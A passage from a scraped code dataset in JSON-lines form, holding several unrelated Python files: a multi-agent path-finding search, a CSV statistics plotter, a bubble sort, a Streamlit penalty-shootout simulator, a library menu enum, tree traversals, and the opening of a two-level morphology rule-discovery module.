of rM*. \n sub_start_v the full position tuple of the vertex which has the collision '''\n #map this_graph_sub_id to global ids\n # create sub_start_dic and sub_end_dict\n # get next sub_graph position\n # map next_sub_graph position back to dict with keys of this_sub_graph_id\n if type(this_graph_sub_id) == int:\n this_graph_sub_id = frozenset([this_graph_sub_id])\n assert type(this_graph_sub_id) == frozenset\n def sort_iterable(variable):\n a = list(variable)\n a.sort()\n return a\n this_graph_sub_id = frozenset(sort_iterable(this_graph_sub_id))\n #assume v positions always arranged in ascending order of global id keys\n true_ids = sort_iterable(self.end_dict.keys())\n sub_start_dict = dict()\n for id in this_graph_sub_id:\n sub_start_dict[true_ids[id]] = sub_start_v[id]\n \n sub_end_dict = dict()\n for id in this_graph_sub_id:\n sub_end_dict[true_ids[id]] = self.end_dict[true_ids[id]]\n\n graph_id = tuple(sort_iterable(sub_start_dict.keys()))\n assert graph_id == tuple(sort_iterable(sub_end_dict.keys()))\n\n if not graph_id in self.sub_graphs:\n if len(graph_id) > 1:\n print(\"End dict is {}\".format(sub_end_dict))\n temp = type(self)(sub_end_dict, self.expand_position, \\\n self.get_next_joint_policy_position, self.heuristic_shortest_path_cost, self.sub_graphs, inflation=self.inflation)\n if not graph_id in self.sub_graphs:\n print(\"Id is: {} Sub end dict is: {}\".format(graph_id, sub_end_dict))\n next_sub_v = self.sub_graphs[graph_id](sub_start_dict, sub_end_dict)\n elif len(graph_id) == 1:\n agent_id = graph_id[0]\n pos = sub_start_dict[agent_id]\n next_sub_v = {agent_id: self.get_next_joint_policy_position(agent_id, pos)[-1]}\n else:\n raise Exception(\"Graph id has to be len >= 1\")\n else:\n assert len(graph_id) > 1\n next_sub_v = self.sub_graphs[graph_id](sub_start_dict, sub_end_dict)\n \n #map glabal keys back to relative keys:\n next_sub_v_relative_id = {}\n this_graph_sub_id_keys =[k for k in this_graph_sub_id]\n this_graph_sub_id_keys.sort()\n for i,val in enumerate(next_sub_v.values()):\n next_sub_v_relative_id[this_graph_sub_id_keys[i]] = val\n return next_sub_v_relative_id\n\n def retrieve_next_optimal_pos(self, start_dict, end_dict):\n def sort_iterable(variable):\n a = list(variable)\n a.sort()\n return a\n \n assert self.end_dict == end_dict\n assert type(start_dict) == dict\n assert set(start_dict.keys()) == set(end_dict.keys())\n start_tup = []\n for k in sort_iterable(start_dict.keys()):\n start_tup.append(start_dict[k])\n start_tup = tuple(start_tup)\n end_tup = []\n for k in sort_iterable(end_dict.keys()):\n end_tup.append(end_dict[k])\n end_tup = tuple(end_tup)\n \n start_v = (start_tup, start_tup)\n end_v = (end_tup, end_tup)\n actions = self.search(start_tup, end_tup)\n v = self.all_v.all_v[start_v]\n next_v_tup = None\n if v.v_id == end_v:\n next_v_tup = start_v\n elif v.forward_pointer is None:\n assert actions is None\n next_v_tup = None\n else:\n next_v = v.forward_pointer\n cntr = 0\n while (not next_v is None) and next_v.is_standard == False:\n next_v = next_v.forward_pointer\n cntr += 1\n if cntr > 50000:\n raise Exception(\"Infinite while loop\")\n if next_v is None:\n next_v_tup = None\n else:\n next_v_tup = next_v.v_id\n if not next_v_tup is None:\n assert next_v_tup[0] == next_v_tup[1]\n next_v_dict = {}\n inter_v, root_v = next_v_tup\n for k, inter_pos, root_pos in zip(sort_iterable(end_dict.keys()), inter_v, root_v):\n next_v_dict[k] = inter_pos #(inter_pos, root_pos)\n else:\n next_v_dict = None\n return next_v_dict\n\n \n def search(self,start_pos, end_pos, OD = True):\n open = PriorityQueue2()\n start_v = (start_pos, start_pos)\n end_v = (end_pos, end_pos)\n if len(self.all_v.all_v) > 1:\n for k,v in self.all_v.all_v.items():\n v.collision_set = frozenset()\n v.g = 1e6\n v.f = None\n v.back_set = dict()\n v.back_ptr = None\n \n vs = self.all_v.get(start_v)\n vs.g = 0\n vs.f = vs.g + self.heuristic_SIC(vs.v_id)\n open.push((vs.f, vs))\n if OD:\n expand_function = self.expand_rOD\n else:\n print(\"Not implemented\")\n\n while not open.empty():\n vk = open.pop()\n test = vk.v_id\n if vk.v_id == end_v or vk.forward_pointer is not None:\n if vk.v_id == end_v:\n self._set_forward_pointers(vk)\n return self._back_track(vk)\n else:\n self._set_forward_pointers(vk)\n cntr1 = 0\n while vk.forward_pointer is not None:\n vk = vk.forward_pointer\n cntr1 +=1\n assert cntr1 < 50000\n assert vk.v_id == end_v\n return self._back_track(vk)\n \n for vl_id in expand_function(vk, self.end_dict):\n # Intermediate nodes not part of backprop\n #For standard v only\n vl = self.all_v.get(vl_id)\n v_pos = vl.v_id[-1]\n col = self._is_pos_colliding(v_pos)\n if vl.is_standard:\n vl.add_back_set(vk)\n vl.add_collision(col)\n self._backprop(vk, vl.collision_set, open)\n if (len(col) == 0 or vl.is_standard==False) and vk.g + self.get_move_cost(vk,vl, end_pos) < vl.g:\n vl.g = vk.g + self.get_move_cost(vk,vl, end_pos)\n vl.f = vl.g + self.heuristic_SIC(vl.v_id)\n vl.back_ptr = vk\n open.push((vl.f, vl))\n print(\"returning no solution\")\n print(\"This graph is {}\".format(tuple(list(self.end_dict.keys()))))\n for k,v in self.all_v.all_v.items():\n f_ptr = None\n if not v.forward_pointer is None:\n f_ptr = v.forward_pointer.v_id\n print(\"V: {} Forward_ptr: {} \".format(k, f_ptr))\n return None\n\n def _backprop(self, v_k, c_l, open):\n if v_k.is_standard:\n if not v_k.is_col_subset(c_l):\n v_k.add_collision(c_l)\n if not v_k in open:\n priority = v_k.g + self.heuristic_SIC(v_k.v_id)\n open.push((priority, v_k))\n for v_m in v_k.get_back_set():\n self._backprop(v_m, v_k.collision_set, open)\n\n def euristic_SICh(self, v_id):\n (inter_tup, vertex_pos_tup) = v_id\n total_cost = 0\n true_id = list(self.end_dict.keys())\n for i, pos in enumerate(inter_tup):\n i_true = true_id[i]\n if pos == \"_\":\n total_cost += self.heuristic_shortest_path_cost(i_true, vertex_pos_tup[i])\n else:\n total_cost += self.heuristic_shortest_path_cost(i_true, pos)\n return total_cost * self.inflation\n \n def _is_pos_colliding(self, v_pos):\n '''Returns set of coll agents '''\n hldr = set()\n for i, vi in enumerate(v_pos):\n for i2, vi2 in enumerate(v_pos):\n if i != i2:\n if vi == vi2:\n hldr.add(i)\n hldr.add(i2)\n hldr = frozenset([i for i in hldr])\n return hldr \n\n def get_move_cost(self, vk, vn, end_pos):\n '''Cost of moving from vertex vk to vn '''\n #It is possible for vk and vn to both be standard nodes. Need to account for this in cost\n # Due to subdimensional expansion, expanded node neighbours are not always 1 appart. \n # eg. expanding a standard node where x agents follow individually optimal policies\n \n assert len(end_pos) == self.v_len\n end = list(end_pos)\n # Four possible conditions for vk and vn being either standard or\n if vk.is_standard:\n if vn.is_standard:\n cost = self.v_len\n #count number of transitions from goal to goal pos\n num_agents_stay_on_goal = 0\n for gp, pk,pn in zip(end, vk.v_id[0], vn.v_id[0]):\n if pk == gp and pn == gp:\n num_agents_stay_on_goal += 1\n cost -= num_agents_stay_on_goal\n assert cost >= 0\n else:\n #vk should be root node of vn\n assert vk.v_id[1] == vn.v_id[1]\n cnt_vn = 0\n for g, pn,pk in zip(end, vn.v_id[0], vk.v_id[0]):\n if not pn == '_':\n if pn == g and pk == g: #if agent stayed on goal\n cnt_vn += 0\n else:\n cnt_vn += 1\n cost = cnt_vn\n else:\n if vn.is_standard:\n num_pos_canged = 0\n cost = 0\n for gp, pk, pn, pk_root in zip(end, vk.v_id[0], vn.v_id[0], vk.v_id[1]):\n if pk == '_':\n assert not pn == \"_\"\n num_pos_canged += 1\n if pn == gp and pk_root == gp:\n cost += 0\n else:\n cost += 1\n assert num_pos_canged == 1\n else:\n num_pos_canged = 0\n cost = 0\n for gp, pk, pn, pk_root in zip(end, vk.v_id[0], vn.v_id[0], vk.v_id[1]):\n if pk == '_' and not pn == \"_\":\n num_pos_canged += 1\n if pn == gp and pk_root == gp:\n cost += 0\n else:\n cost += 1\n assert num_pos_canged == 1\n \n assert cost >= 0 #vn should always be of higher count\n return cost\n \n\n def expand_rOD(self, v, end_dict):\n assert len(end_dict) == self.v_len\n (inter_tup, vertex_pos_tup) = v.v_id\n next_inter_tup = [] #list(inter_tup)\n # If standard node create next intermediate node base\n # else convert current inter_tup to list\n if not \"_\" in inter_tup: #if stadard node\n assert(v.is_standard)\n collision_set = v.collision_set\n next_tup = {i:None for i in range(self.v_len)}\n this_all_ids = frozenset([i for i in range(self.v_len)])\n for c in collision_set:\n if len(c) == len(self.agent_ids):\n assert len(collision_set) == 1\n assert c == this_all_ids\n for i in this_all_ids:\n next_tup[i] = \"_\"\n else:\n n_p = self.query_sub_graph_optimal_policy(c, v.v_id[0])\n hldr = set([i for i in c])\n hldr2 = set(n_p.keys())\n assert hldr == hldr2\n for k,val in n_p.items():\n assert next_tup[k] is None\n next_tup[k] = val\n all_col_ids = []\n for c in collision_set:\n for c2 in c:\n all_col_ids.append(c2)\n all_col_ids = frozenset(all_col_ids)\n diff = this_all_ids.difference(all_col_ids)\n\n #Get next shortest path position for non-colliding agents\n for d in diff:\n assert not \"_\" in next_inter_tup\n n_pos = self.query_sub_graph_optimal_policy(d, v.v_id[0])\n for k,val in n_pos.items():\n assert next_tup[k] is None\n next_tup[k] = val\n next_inter_tup = list(next_tup.values())\n assert not None in next_inter_tup\n else:\n next_inter_tup = list(inter_tup)\n \n #Deterimine intermediate node level\n this_inter_level = None\n for i,p in enumerate(next_inter_tup):\n if p == '_':\n this_inter_level = i\n break\n \n all_next_inter_tup = []\n if not this_inter_level is None:\n #if not a standard vertex\n pos = vertex_pos_tup[this_inter_level]\n positions_taken = [p for p in next_inter_tup if p != '_']\n n_pos = self.expand_position(i, pos)\n valid_n_pos = [p for p in n_pos if not p in positions_taken]\n\n if len(valid_n_pos) == 0:\n return []\n for p in valid_n_pos:\n next_inter_tup[this_inter_level] = p \n all_next_inter_tup.append(tuple(next_inter_tup))\n else:\n all_next_inter_tup.append(tuple(next_inter_tup))\n assert not \"_\" in next_inter_tup #should be standard node\n\n #Make v_id's:\n v_ids = []\n for inter_v in all_next_inter_tup:\n if not \"_\" in inter_v:\n v_ids.append((tuple(inter_v), tuple(inter_v)))\n else:\n v_ids.append((tuple(inter_v), vertex_pos_tup))\n return v_ids\n \n\n def expand_joint_actions(self, v):\n raise Exception(\"This function should not be called\")\n (inter_tup, vertex_pos_tup) = v.v_id\n assert inter_tup == vertex_pos_tup\n num_agents = len(vertex_pos_tup)\n all_positions = dict()\n collisions = v.collision_set\n for i,p in enumerate(vertex_pos_tup):\n if i in collisions:\n\n all_positions[i] = self.expand_position(i, p)\n else:\n n_pos = self.get_next_joint_policy_position(i, p)\n all_positions[i] = n_pos \n joint_positions = ParameterGrid(all_positions)\n next_v_id = []\n for j_pos in joint_positions:\n v_id = tuple([j_pos[i] for i in range(num_agents)])\n v_id = (v_id, v_id)\n next_v_id.append(v_id)\n return next_v_id\n \n def _set_forward_pointers(self, goal_v):\n this_v = goal_v\n while not this_v.back_ptr is None:\n back_v = this_v.back_ptr\n back_v.forward_pointer = this_v\n this_v = back_v\n\n def _back_track(self, goal_v):\n '''Returns a dictionary of actions for the optimal path '''\n self.pos_act = {(0,1):2,\n (1,0):3,\n (0,-1):4,\n (-1,0):1,\n (0,0): 0}\n \n #get vertices:\n all_v = []\n all_v.append(goal_v.v_id[-1])\n next_v = goal_v.back_ptr\n while not next_v is None:\n if next_v.is_standard:\n all_v.append(next_v.v_id[-1])\n next_v = next_v.back_ptr\n #Get actions from vertices:\n all_actions = []\n prev_v = all_v[-1]\n for v in reversed(all_v[:-1]):\n actions = {}\n for i, (previous_position, next_postion) in enumerate(zip(prev_v, v)):\n position_diff = self._add_tup(next_postion, self._mult_tup(previous_position, -1))\n actions[i] = self.pos_act[position_diff]\n prev_v = v\n all_actions.append(actions)\n return all_actions\n\n def _add_tup(self, a,b):\n assert len(a) == len(b)\n ans = []\n for ia,ib in zip(a,b):\n ans.append(ia+ib)\n return tuple(ans)\n\n def _mult_tup(self, a, m):\n ans = []\n for ai in a:\n ans.append(ai*m)\n return tuple(ans)\n\n\n\n","repo_name":"Jamesellis51015/Multi-Agent-Path-Finding-with-Reinforcement-Learning","sub_path":"utils/ODrM_star.py","file_name":"ODrM_star.py","file_ext":"py","file_size_in_byte":26862,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"51"} +{"seq_id":"23059665812","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport argparse\nimport logging\nimport pandas\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n\nlogger = logging.getLogger(__name__)\n\n\nLOG_FORMAT = \"%(asctime)-15s %(levelname)s %(relativeCreated)dms \" \\\n \"%(filename)s::%(funcName)s():%(lineno)d %(message)s\"\n\n\nclass Formatter(argparse.ArgumentDefaultsHelpFormatter,\n argparse.RawDescriptionHelpFormatter):\n pass\n\n\ndef _parse_arguments(desc, args):\n \"\"\"\n Parses command line arguments\n :param desc:\n :param args:\n :return:\n \"\"\"\n parser = argparse.ArgumentParser(description=desc,\n formatter_class=Formatter)\n parser.add_argument('csvfile', help='Input CSV file')\n parser.add_argument('--matplotlibgui', default='Qt4Agg',\n help='Library to use for plotting')\n parser.add_argument('--logconf', default=None,\n help='Path to python logging configuration file in '\n 'this format: https://docs.python.org/3/library/'\n 'logging.config.html#logging-config-fileformat '\n 'Setting this overrides -v parameter which uses '\n ' default logger. (default None)')\n parser.add_argument('--verbose', '-v', action='count', default=0,\n help='Increases verbosity of logger to standard '\n 'error for log messages in this module '\n '. Messages are '\n 'output at these python logging levels '\n '-v = ERROR, -vv = WARNING, -vvv = INFO, '\n '-vvvv = DEBUG, -vvvvv = NOTSET (default no '\n 'logging)')\n\n return parser.parse_args(args)\n\n\ndef _setup_logging(args):\n \"\"\"\n Sets up logging based on parsed command line arguments.\n If args.logconf is set use that configuration otherwise look\n at args.verbose and set logging for this module and the one\n in ndexutil specified by TSV2NICECXMODULE constant\n :param args: parsed command line arguments from argparse\n :raises AttributeError: If args is None or args.logconf is None\n :return: None\n \"\"\"\n\n if args.logconf is None:\n level = (50 - (10 * args.verbose))\n logging.basicConfig(format=LOG_FORMAT,\n level=level)\n logger.setLevel(level)\n return\n\n # logconf was set use that file\n logging.config.fileConfig(args.logconf,\n disable_existing_loggers=False)\n\n\ndef run(theargs):\n \"\"\"\n Using pandas this function reads in the csvfile input file and\n generates 2 figures with subplots in each figure. The first\n figure contains scatter subplots and the second figure is a\n histogram plot for each column of the data.\n\n NOTE: In this implementation matplotlib will pause after\n creating the figures\n so the caller must close the figures for the program to exit\n\n :param theargs: arguments from ArgParse\n :return: 0 upon success otherwise failure\n \"\"\"\n matplotlib.use(theargs.matplotlibgui)\n df = pandas.read_csv(theargs.csvfile, delimiter=',',\n header=None)\n csvfilename = os.path.basename(theargs.csvfile)\n\n fig, axes = plt.subplots(nrows=2, ncols=3)\n fig.suptitle(csvfilename + ' plots', fontsize=16)\n fig.set_size_inches((18, 11))\n # nodes vs number clusters\n ax = df.plot(ax=axes[1, 0], kind='scatter', x=1, y=6, color='red')\n ax.set_xlabel('# of Nodes')\n ax.set_ylabel('# of clusters')\n axes[1, 0].set_title('# of nodes')\n\n # edges vs number clusters\n ax = df.plot(ax=axes[0, 0], kind='scatter', x=2, y=6, color='green')\n ax.set_xlabel('# of edges')\n ax.set_ylabel('# of clusters')\n axes[0, 0].set_title('# of edges')\n\n # density vs number clusters\n ax = df.plot(ax=axes[1, 1], kind='scatter', x=3, y=6, color='blue')\n ax.set_xlabel('Density')\n ax.set_ylabel('# of clusters')\n axes[1, 1].set_title('Density')\n\n # DegreeMean vs number clusters\n logger.debug(df.head())\n ax = df.plot(ax=axes[1, 2], kind='scatter', x=4, y=6, color='yellow')\n ax.set_xlabel('DegreeMean')\n ax.set_ylabel('# of clusters')\n axes[1, 2].set_title('DegreeMean')\n\n # number nodes vs number edges\n logger.debug(df.head())\n ax = df.plot(ax=axes[0, 2], kind='scatter', x=1, y=2, color='pink')\n ax.set_xlabel('# of nodes')\n ax.set_ylabel('# of edges')\n axes[0, 2].set_title('# nodes vs # edges')\n\n # Degree Stddev vs number clusters\n ax = df.plot(ax=axes[0, 1], kind='scatter', x=5, y=6, color='orange')\n ax.set_xlabel('DegreeStddev')\n ax.set_ylabel('# of clusters')\n axes[0, 1].set_title('Degree Stddev')\n\n # display figure 1 (the scatter plots) and dont pause (block=False)\n plt.show(block=False)\n\n # histogram plot using pandas feature df.hist that\n # creates a figure with 6 subplots (one for each column)\n hist = df.hist(column=[1, 2, 3, 4, 5, 6], figsize=(11, 8))\n hist[0][0].title.set_text('# nodes histogram')\n logger.debug(hist[0][0])\n hist[0][1].title.set_text('# edges histogram')\n hist[1][0].title.set_text('Density histogram')\n hist[1][1].title.set_text('Degree mean histogram')\n hist[2][0].title.set_text('Degree stddev histogram')\n hist[2][1].title.set_text('# clusters histogram')\n hfig = plt.figure(2)\n hfig.suptitle(csvfilename + ' histogram plots', fontsize=16)\n\n # display figure 2 (histograms) and wait (block=True)\n logger.info('Displaying figures and '\n 'waiting for user to close figures')\n plt.show(block=True)\n\n return 0\n\n\ndef main(args):\n \"\"\"\n Main entry point for program\n :param args:\n :return:\n \"\"\"\n desc = \"\"\"\n \n Plots hierarchy stats\n\n \"\"\"\n theargs = _parse_arguments(desc, args[1:])\n theargs.program = args[0]\n\n try:\n _setup_logging(theargs)\n return run(theargs)\n except Exception as e:\n logger.exception('Caught exception')\n return 2\n finally:\n logging.shutdown()\n\n\nif __name__ == '__main__': # pragma: no cover\n sys.exit(main(sys.argv))\n","repo_name":"coleslaw481/ud985","sub_path":"plot_hierarchystats.py","file_name":"plot_hierarchystats.py","file_ext":"py","file_size_in_byte":6242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38582391507","text":"def Bubble_Sort(A):\n\tFlag=1\n\twhile Flag==1:\n\t\tFlag=0\n\t\tfor j in range(len(A)-1):\n\t\t\tif(A[j] > A[j+1]):\n\t\t\t\tA[j], A[j+1] = A[j+1], A[j]\n\t\t\t\tFlag=1\n\t\t\t\t\nA = list(range(900,0,-1))\nBubble_Sort(A)\nprint(A)\n","repo_name":"ashwek/Python_Algorithms","sub_path":"2_Sorting_and_Order_Statistics/Bubble_Sort.py","file_name":"Bubble_Sort.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"23059603942","text":"import streamlit as st\nfrom simulation import main\nimport plotly.graph_objects as go\n\nst.set_page_config(page_title=\"Liverpool Vs. Real Madrid Penalty Shoutout Simulation\", page_icon=\"🏆\", layout=\"centered\", initial_sidebar_state=\"expanded\")\n\nhide_streamlit_style = \"\"\"\n \n \"\"\"\nst.markdown(hide_streamlit_style, unsafe_allow_html=True) \n\nst.markdown(\"

Penalty Shootout Simulation

\", unsafe_allow_html=True)\n\nst.markdown(\"

Simulation Results

\", unsafe_allow_html=True)\n\nlp_wins, lp_win_prob = st.columns(2)\n\nwith lp_wins:\n st.markdown(f\"

Liverpool Wins

\", unsafe_allow_html=True)\n\n liverpool_wins = st.empty()\n\nwith lp_win_prob:\n st.markdown(f\"

Liverpool FC Win Probability

\", unsafe_allow_html=True)\n\n liverpool_win_probs = st.empty()\n\nrm_wins, rm_win_prob = st.columns(2)\n\nwith rm_wins:\n st.markdown(f\"

Real Madrid Wins

\", unsafe_allow_html=True)\n\n real_madrid_wins = st.empty()\n\nwith rm_win_prob:\n st.markdown(f\"

Real Madrid Win Probability

\", unsafe_allow_html=True)\n\n real_madrid_win_probs = st.empty()\n\nchart = st.empty()\n\nwith st.sidebar:\n st.markdown(\"

Simulation Parameters

\", unsafe_allow_html=True)\n with st.form('Enter the number of simulations to run'):\n number_of_simulations = st.number_input(\"Number of simulations\", min_value=1, max_value=1000000, value=1000)\n\n\n button = st.form_submit_button(\"Run Simulation\")\n # If hover over any button it will darken the button\n st.markdown('', unsafe_allow_html=True)\n\n\n if button: \n results = main(number_of_simulations)\n\n liverpool_stats = results[0]\n real_madrid_stats = results[1]\n\n liverpool_win_count = liverpool_stats[0]\n liverpool_win_probability = liverpool_stats[1]\n\n real_madrid_win_count = real_madrid_stats[0]\n real_madrid_win_probability = real_madrid_stats[1]\n\n\n liverpool_wins.markdown(f\"\"\"

{liverpool_win_count.__format__(',.0f')}

\"\"\", unsafe_allow_html=True)\n\n liverpool_win_probs.markdown(f\"

{str(liverpool_win_probability.__format__('.2f'))}%

\", unsafe_allow_html=True)\n\n real_madrid_wins.markdown(f\"\"\"

{real_madrid_win_count.__format__(',.0f')}

\"\"\", unsafe_allow_html=True)\n\n real_madrid_win_probs.markdown(f\"

{str(real_madrid_win_probability.__format__('.2f'))}%

\", unsafe_allow_html=True)\n\n \n\n fig = go.Figure(data=[go.Bar(x=['Liverpool Wins', 'Real Madrid Wins'], y=[liverpool_win_count, real_madrid_win_count], name='Wins')])\n fig.update_layout(title_text='Wins', xaxis_title='Results', yaxis_title='Count')\n \n # Change the color of each bar\n fig.update_traces(marker_color=['#F0544F', '#C6D8D3', '#D81E5B'])\n\n fig.update_layout(title_text=\"Simulation Results\", title_x=0.5)\n\n chart.plotly_chart(fig)\n\n\n\n\n \n\n","repo_name":"colesmcintosh/penalty-shootout-simulation","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"38004980318","text":"from enum import Enum\n\nFILE_BOOKS = \"books.json\"\nFILE_CUSTOMER = \"customer.json\"\nFILE_LOANS = \"loans.json\"\n\n'''\nconstant varible menu for the main class\n'''\n\nclass Menu(Enum):\n ADD_A_NEW_CUSTOMER = '1'\n DISPLAY_ALL_CUSTOMERS = '2'\n FIND_CUSTOMER_BY_NAME = '3'\n REMOVE_CUSTOMER = '4'\n ADD_A_NEW_BOOK = '5'\n DISPLAY_ALL_BOOKS = '6'\n FIND_BOOK_BY_NAME = '7'\n REMOVE_BOOK = '8'\n LOAN_A_BOOK = '9'\n RETURN_A_BOOK = '10'\n DISPLAY_ALL_LOANS = '11'\n DISPLAY_LATE_LOANS = '12'\n EXIT = '13'","repo_name":"oferkarp/MyLibory","sub_path":"constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"11270095214","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\ntree = {}\r\n\r\nfor _ in range(n):\r\n root, left, right = input().split()\r\n tree[root] = [left, right]\r\n\r\n# 전위순회 = 루트, 왼쪽, 오른쪽\r\ndef preorder(root):\r\n if root != '.':\r\n print(root, end='')\r\n preorder(tree[root][0])\r\n preorder(tree[root][1])\r\n\r\n# 중위순회 = 왼쪽, 루트, 오른쪽\r\ndef inorder(root):\r\n if root != '.':\r\n inorder(tree[root][0])\r\n print(root, end='')\r\n inorder(tree[root][1])\r\n\r\n# 후위순회 = 왼쪽, 오른쪽, 루트 \r\ndef postorder(root):\r\n if root != '.':\r\n postorder(tree[root][0])\r\n postorder(tree[root][1])\r\n print(root, end='')\r\n\r\npreorder('A')\r\nprint()\r\ninorder('A')\r\nprint()\r\npostorder('A')","repo_name":"nevertheless0404/Keep_studying","sub_path":"백준/Silver/1991. 트리 순회/트리 순회.py","file_name":"트리 순회.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"27324781901","text":"\"\"\"A module for dicovering raw two-level rules from a set of carefully chosen examples\n\nExamples, contexts and rules are treated in terms of strings without any\nfinite-state machinery or rule compilation. Examples and contexts are\nspace separated sequences of pair-symbols. \n\n© Kimmo Koskenniemi, 2017-2018. Free software under the GPL 3 or later.\n\"\"\"\n\nimport sys\nimport re\nimport cfg\nimport twexamp\n\npair_symbols_for_input = {} # key: input symbol, value: set of pair symbols\npair_symbols_for_output = {}\n\ndef relevant_contexts(pair_symbol):\n \"\"\"Select positive and negative contexts for a given pair-symbol\n \n pair_symbol -- the pair-symbol for which the contexts are selected\n \n returns a tuple of:\n \n pos_context_set -- a set of contexts in the examples where the\n pair_symbol occurs\n \n neg_context_set -- a set of contexts where the input-symbol of the\n pair_symbol occurs with another output-symbol but so that there is\n no example in the example_set where the pair_symbol occurs in such a\n context\n \"\"\"\n input_symbol, output_symbol = cfg.pairsym2sympair(pair_symbol)\n positive_context_set = set()\n negative_context_set = set()\n pairsymlist = [re.sub(r\"([}{])\", r\"\\\\\\1\", psym)\n for psym\n in pair_symbols_for_input[input_symbol]]\n # print(\"pairsymlist:\", pairsymlist) ##\n pattern = re.compile(\"|\".join(pairsymlist))\n for example in cfg.example_set:\n for m in pattern.finditer(example):\n i1 = m.start()\n i2 = m.end()\n # print('\"' + example[0:i1] +'\"', '\"' + example[i2:] + '\"') ##\n left_context = \".#. \" + example[0:i1-1]\n centre = example[i1:i2]\n if i2 >= len(example):\n right_context = \".#.\"\n else:\n right_context = example[i2+1:] + \" .#.\"\n context = (left_context, right_context)\n # print(centre, context) ##\n if centre == pair_symbol:\n positive_context_set.add(context)\n else:\n negative_context_set.add(context)\n negative_context_set = negative_context_set - positive_context_set\n return positive_context_set, negative_context_set\n \ndef ppcontexts(ctxs, title):\n \"\"\"Print a list of context for tracing and debugging\"\"\"\n print(title)\n for lc, rc in sorted(ctxs):\n print(lc, \"_\", rc)\n\ndef shorten_contexts(contexts, left_length, right_length):\n if cfg.verbosity >= 25:\n print(\"left and right length:\", left_length, right_length)\n ppcontexts(contexts, \"contexts as given to shorten_contexts()\")\n new_contexts = set()\n for left_context, right_context in contexts:\n left_lst = left_context.split(\" \")\n start = max(0, len(left_lst) - left_length)\n new_lc = \" \".join(left_lst[start:])\n # print(\"start:\", start, \"new_lc:\", new_lc)\n right_lst = right_context.split(\" \")\n new_rc = \" \".join(right_lst[0:right_length])\n new_contexts.add((new_lc, new_rc))\n return(new_contexts)\n\ndef minimal_contexts(pair_symbol, pos_contexts, neg_contexts):\n \"\"\"Shortens the left and right contexts step by step\n \n Finds shortest contexts which accept correct occurrences of\n pair_symbol and still reject the incorrect occurrences of it.\n \n pair_symbol -- a pair-symbol, e.g. '{aä}:a' for which the optimal\n contexts are computed\n \n pos_context, neg_contexts -- selected from the examples\n \n returns a tuple: (positive_contexts, negative_contexts)\n \"\"\"\n if cfg.verbosity >= 25:\n ppcontexts(pos_contexts, \"positive contexts for \" + pair_symbol)\n ppcontexts(neg_contexts, \"negative contexts for \" + pair_symbol)\n # find maximum lengths (in psyms) of left and right contexts\n left_len = 0\n right_len = 0\n for left_context, right_context in pos_contexts:\n lcount = left_context.count(\" \")\n if lcount >= left_len: left_len = lcount + 1\n rcount = right_context.count(\" \")\n if rcount >= right_len: right_len = rcount + 1\n for left_context, right_context in neg_contexts:\n lcount = left_context.count(\" \")\n if lcount >= left_len: left_len = lcount + 1\n rcount = right_context.count(\" \")\n if rcount >= right_len: right_len = rcount + 1\n\n # shorten the contexts stepwise while the positive and\n # the negative contexts stay disjoint\n p_contexts = pos_contexts.copy()\n n_contexts = neg_contexts.copy()\n left_incomplete = True\n right_incomplete = True\n while left_incomplete or right_incomplete:\n # print(left_len, right_len) ##\n if left_incomplete and left_len > 0:\n new_p_contexts = shorten_contexts(p_contexts, left_len-1, right_len)\n new_n_contexts = shorten_contexts(n_contexts, left_len-1, right_len)\n if new_p_contexts.isdisjoint(new_n_contexts):\n # print(\"still disjoint\") ##\n p_contexts = new_p_contexts\n n_contexts = new_n_contexts\n left_len = left_len - 1\n else:\n if cfg.verbosity >= 25:\n print(\"left side now complete\") ##\n ppcontexts(new_p_contexts & new_n_contexts,\n \"intersection of new pos and neg contexts\")\n left_incomplete = False\n elif right_incomplete and right_len > 0:\n new_p_contexts = shorten_contexts(p_contexts, left_len, right_len-1)\n new_n_contexts = shorten_contexts(n_contexts, left_len, right_len-1)\n if new_p_contexts.isdisjoint(new_n_contexts):\n # print(\"still disjoint\") ##\n p_contexts = new_p_contexts\n n_contexts = new_n_contexts\n right_len = right_len - 1\n else:\n # print(\"left side now complete\") ##\n right_incomplete = False\n else:\n break\n if cfg.verbosity >= 25:\n ppcontexts(p_contexts, \"positive contexts\")\n ppcontexts(n_contexts, \"negative contexts\")\n return p_contexts, n_contexts\n\ndef print_rule(pair_symbol, operator, contexts):\n \"\"\"Prints one rule\"\"\"\n print(pair_symbol, operator)\n rule_lst = [\" {} _ {}\".format(lc, rc) for lc, rc in contexts]\n print(\",\\n\".join(rule_lst) + \" ;\")\n return\n\ndef context_to_output_str(pairsym_str):\n pairsym_lst = pairsym_str.split(\" \")\n sympair_lst = [cfg.pairsym2sympair(psym) for psym in pairsym_lst]\n outsym_lst = [outsym for insym, outsym in sympair_lst]\n return \"\".join(outsym_lst)\n\nif __name__ == \"__main__\":\n import argparse\n arpar = argparse.ArgumentParser(\"python3 twdiscov.py\")\n arpar.add_argument(\"examples\", help=\"example pair strings file\",\n default=\"test.pstr\")\n arpar.add_argument(\"-s\", \"--symbol\",\n help=\"input symbol for which to find rules\",\n default=\"\")\n arpar.add_argument(\"-v\", \"--verbosity\",\n help=\"level of diagnostic output\",\n type=int, default=0)\n args = arpar.parse_args()\n\n cfg.verbosity = args.verbosity\n \n twexamp.read_examples(filename=args.examples, build_fsts=False)\n if cfg.verbosity >= 5:\n print(\"--- all examples read in ---\")\n \n for insym in cfg.input_symbol_set:\n pair_symbols_for_input[insym] = set()\n for insym, outsym in cfg.symbol_pair_set:\n pair_symbol = cfg.sympair2pairsym(insym, outsym)\n pair_symbols_for_input[insym].add(pair_symbol)\n\n if args.symbol:\n pair_set = 